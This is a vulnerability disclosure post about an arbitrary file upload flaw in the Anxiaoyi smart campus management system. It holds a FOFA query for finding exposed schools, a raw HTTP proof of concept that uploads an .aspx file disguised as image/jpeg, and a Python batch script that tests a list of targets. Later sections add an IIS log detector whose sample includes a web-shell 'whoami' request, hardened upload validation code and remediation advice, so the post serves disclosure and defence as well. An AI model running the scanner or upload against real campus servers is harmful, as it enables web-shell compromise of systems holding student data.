Preface
Disclaimer
The methods described in this post may be harmful and are provided solely for security research and teaching. Readers who use them for any other purpose bear full legal and associated liability themselves; the author accepts no responsibility.
I. Vulnerability Overview
Anxiaoyi (安校易) is an integrated "Internet + education" informatization solution from Fuzhou Yinda Yunchuang Information Technology Co., Ltd., built on the company's experience in education-sector IT projects, customer requirements research, and the national 13th Five-Year Plan standards for education informatization. It is based on IoT technology and centered on managing students' study, meals, accommodation and movement on campus, integrating cafeteria and consumption management, door access control, student entry and exit management, home-school communication, and identity recognition at the school gate, to reduce blind spots in campus management and raise the level of campus safety. The Smart Campus (Anxiaoyi) management system from this vendor has an arbitrary file upload vulnerability in FileUpAd.aspx: the upload handler does not restrict the extension of the uploaded file (the PoC below uploads abc.aspx with a declared part Content-Type of image/jpeg and the extension is kept) and the file is written under a web-accessible directory, so an attacker can upload an ASP.NET web shell and take control of the server.
II. Affected Versions
Smart Campus (Anxiaoyi) Management System
III. Asset Discovery
fofa: title="智慧综合管理平台登入" (the login page title, "Smart Integrated Management Platform Login")
IV. Reproduction
PoC (the part's filename carries the .aspx extension while its Content-Type claims image/jpeg; the server keeps the extension. Content-Length must equal the byte length of the multipart body as sent, which for the body below with CRLF line endings is 178 bytes):
POST /Module/FileUpPage/FileUpAd.aspx?orgid=1&type=NNewsContent HTTP/1.1
Host:
Accept-Encoding: identity
Content-Length: 178
Accept-Language: zh-CN,zh;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=62907949903a4c499178971c9dab4ad9

--62907949903a4c499178971c9dab4ad9
Content-Disposition: form-data; name="Filedata"; filename="abc.aspx"
Content-Type: image/jpeg

edusrc
--62907949903a4c499178971c9dab4ad9--
Path of the uploaded file (the 1 segment matches the orgid value in the request; a GET to this path returns the uploaded body, edusrc):
/imgnews/imgad/1/.aspx
Batch test script:
# -*- coding:utf-8 -*-
import requests
import urllib3

# Suppress the warning that verify=False produces on HTTPS targets
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

BOUNDARY = "62907949903a4c499178971c9dab4ad9"
UPLOAD_PATH = "/Module/FileUpPage/FileUpAd.aspx?orgid=1&type=NNewsContent"
CHECK_PATH = "/imgnews/imgad/1/.aspx"
MARKER = "edusrc"  # body of the uploaded file; looked for when fetching it back


def send_post_request(url, output_file):
    post_url = url + UPLOAD_PATH
    # Content-Length is not set by hand: requests computes it from the body.
    # A hard-coded value that does not match the body would truncate or stall the upload.
    headers = {
        "Accept-Encoding": "identity",
        "Accept-Language": "zh-CN,zh;q=0.8",
        "Accept": "*/*",
        "User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
        "Accept-Charset": "GBK,utf-8;q=0.7,*;q=0.3",
        "Connection": "keep-alive",
        "Cache-Control": "max-age=0",
        "Content-Type": f"multipart/form-data; boundary={BOUNDARY}",
    }
    # Hand-built multipart body: an .aspx filename declared as image/jpeg.
    # The server trusts the declared type and keeps the .aspx extension.
    data = (
        f"--{BOUNDARY}\r\n"
        "Content-Disposition: form-data; name=\"Filedata\"; filename=\"abc.aspx\"\r\n"
        "Content-Type: image/jpeg\r\n\r\n"
        f"{MARKER}\r\n"
        f"--{BOUNDARY}--"
    ).encode()
    try:
        response = requests.post(post_url, headers=headers, data=data, verify=False, timeout=10)
        if response.status_code != 200:
            print(f"status {response.status_code}, upload request failed: {post_url}")
            return
        # Confirm the upload by fetching the file back and looking for the marker
        check_url = url + CHECK_PATH
        check_response = requests.get(check_url, verify=False, timeout=10)
        if check_response.status_code == 200 and MARKER in check_response.text:
            result = f"status {check_response.status_code}, vulnerable: {check_url}"
            print(result)
            with open(output_file, "a", encoding="utf-8") as f:
                f.write(result + "\n")
        else:
            print(f"status {check_response.status_code}, marker '{MARKER}' not found: {check_url}")
    except requests.RequestException as e:
        print(f"request failed: {e}")


if __name__ == "__main__":
    output_file = "output.txt"
    # One target per line, with or without a scheme
    with open("edusrc.txt", "r", encoding="utf-8") as file:
        urls = file.readlines()
    for url in urls:
        url = url.strip().rstrip("/")
        if not url:
            continue
        if not url.startswith(("http://", "https://")):
            url = "http://" + url
        send_post_request(url, output_file)

Usage: python script_name.py (targets are read one per line from edusrc.txt; confirmed hosts are appended to output.txt)
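For the defensive side, the request and path above are enough to write a log check. The following is an added example, not code from the original post or from the vendor: it parses IIS W3C extended log lines (the sample lines are constructed for this example, using the IIS default field set) and flags any request for a script-type file under /imgnews/imgad/, a directory that should only ever serve images, raising the severity when the same client POSTed to FileUpAd.aspx shortly before. The ten-minute correlation window and the extension list are choices for this example.

```python
import re
from datetime import datetime, timedelta

# Constructed IIS W3C extended log excerpt (default field set) for this example:
# a PoC upload followed one second later by the attacker fetching the dropped
# .aspx, a legitimate image fetch, a legitimate admin upload, and a later
# request for a web shell under the upload directory from a second client.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-05-01 02:13:07 10.0.0.5 POST /Module/FileUpPage/FileUpAd.aspx orgid=1&type=NNewsContent 80 - 203.0.113.7 Mozilla/5.0+(Windows+NT+5.1;+rv:5.0) - 200 0 0 41
2024-05-01 02:13:08 10.0.0.5 GET /imgnews/imgad/1/.aspx - 80 - 203.0.113.7 Mozilla/5.0+(Windows+NT+5.1;+rv:5.0) - 200 0 0 12
2024-05-01 02:20:31 10.0.0.5 GET /imgnews/imgad/1/banner.jpg - 80 - 198.51.100.9 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 3
2024-05-01 03:05:12 10.0.0.5 POST /Module/FileUpPage/FileUpAd.aspx orgid=1&type=NNewsContent 80 admin 192.0.2.10 Mozilla/5.0+(Windows+NT+10.0) http://school.example/admin 200 0 0 30
2024-05-01 07:44:59 10.0.0.5 GET /imgnews/imgad/1/cmd.ASPX c=whoami 80 - 198.51.100.22 curl/8.0 - 200 0 0 9
"""

UPLOAD_ENDPOINT = "/module/fileuppage/fileupad.aspx"   # compared lowercase
UPLOAD_DIR = "/imgnews/imgad/"                          # should only ever hold images
# Extensions IIS hands to the ASP.NET pipeline. The PoC drops a file whose whole
# name is ".aspx"; os.path.splitext() returns ('.aspx', '') for such a name, so
# match the extension with a regex on the full path instead of splitext().
SCRIPT_EXT = re.compile(r"\.(aspx?|ashx|asmx|asax|ascx|soap|cer|config)$", re.IGNORECASE)


def parse_iis_log(text):
    """Turn W3C extended log text into dicts keyed by the names in the #Fields line."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # truncated line; skipping beats misaligned columns
        records.append(dict(zip(fields, parts)))
    return records


def find_upload_abuse(records, window=timedelta(minutes=10)):
    """Flag script files requested under the upload directory; escalate when the
    same client POSTed to FileUpAd.aspx within `window` beforehand."""
    alerts, uploads = [], []   # uploads: (timestamp, client ip)
    for r in records:
        ts = datetime.strptime(f"{r['date']} {r['time']}", "%Y-%m-%d %H:%M:%S")
        stem = r["cs-uri-stem"]
        if r["cs-method"] == "POST" and stem.lower() == UPLOAD_ENDPOINT:
            uploads.append((ts, r["c-ip"]))
            continue
        if stem.lower().startswith(UPLOAD_DIR) and SCRIPT_EXT.search(stem):
            correlated = any(ip == r["c-ip"] and timedelta(0) <= ts - t <= window
                             for t, ip in uploads)
            alerts.append({
                "time": f"{r['date']} {r['time']}",
                "client": r["c-ip"],
                "uri": stem,
                "status": r["sc-status"],
                "severity": "high" if correlated else "medium",
            })
    return alerts


if __name__ == "__main__":
    for alert in find_upload_abuse(parse_iis_log(SAMPLE_LOG)):
        print(alert)
```

Run against the sample it reports two alerts: the PoC's own fetch of /imgnews/imgad/1/.aspx as high (same client uploaded one second earlier) and the later cmd.ASPX request as medium; the banner.jpg fetch and the admin's upload are not reported. In production, feed it the real log files and treat any hit as a compromised host until the directory listing proves otherwise.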
V. Remediation
1. Unless it is necessary, do not expose the system to the public internet.
2. Restrict access with a firewall or similar device and allow only an allowlist of source addresses.
3. Upgrade the product to the latest version.
4. In the upload handler itself, validate the file extension server-side against an allowlist of image types instead of trusting the client's Content-Type header (the PoC passes with filename abc.aspx and Content-Type: image/jpeg), store uploads under a server-generated name, and disable script execution for the /imgnews/imgad/ directory in IIS so that any file that does slip through is served as static content rather than run.
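What the upload handler should have done, as an added illustration (not the vendor's code; nothing about FileUpAd.aspx's real logic is known beyond what the PoC shows): the weak policy models the behaviour the PoC demonstrates, acceptance driven by the client-declared Content-Type with the client's filename kept, and the hardened policy ignores the declared type, allows only a fixed set of image extensions, rejects names with an empty base name (such as .aspx), nested extensions or path components, checks the leading bytes against the image signature, and chooses the stored name itself. The ALLOWED table and the name rule are choices for this example.

```python
import os
import re
import secrets

# Allowed image extensions and the leading bytes ("magic") each must carry.
# A constructed allowlist for this example; extend it to whatever the news
# module genuinely needs, and nothing else.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Client-controlled name: 1-64 safe characters, one dot, a short extension.
# No empty base name (".aspx"), no nested extensions ("x.aspx.jpg"), no path parts.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})")


def weak_accept(filename, declared_type, content):
    """Model of the behaviour the PoC demonstrates: the only gate is the
    client-declared part Content-Type, and the client's filename is kept."""
    if not declared_type.startswith("image/"):
        return None
    return filename  # abc.aspx lands on disk with its extension intact


def hardened_accept(filename, declared_type, content):
    """Server-side policy. `declared_type` is deliberately ignored: the client
    chose it, so it proves nothing. Returns the name to store under, or None."""
    base = os.path.basename(filename.replace("\\", "/"))  # strip any path component
    m = SAFE_NAME.fullmatch(base)
    if m is None:
        return None
    ext = m.group(1).lower()
    if ext not in ALLOWED:
        return None
    if not content.startswith(ALLOWED[ext]):
        return None  # body is not the image type the extension claims
    # Never reuse the client's name; a random server-chosen name plus the
    # validated extension also defeats guessing of the stored path.
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    poc = ("abc.aspx", "image/jpeg", b"edusrc")
    print("weak    :", weak_accept(*poc))       # abc.aspx, a web shell on disk
    print("hardened:", hardened_accept(*poc))   # None, rejected
    print("real jpg:", hardened_accept("logo.jpg", "image/jpeg", b"\xff\xd8\xff\xe0" + b"\x00" * 12))
```

The PoC's part passes weak_accept and is rejected by hardened_accept on the extension alone; a real JPEG is accepted whatever Content-Type the client declares, and a file named logo.jpg whose body is ASP.NET source is refused by the magic-byte check. Pair this with the IIS directory setting from item 4 so the two controls fail independently.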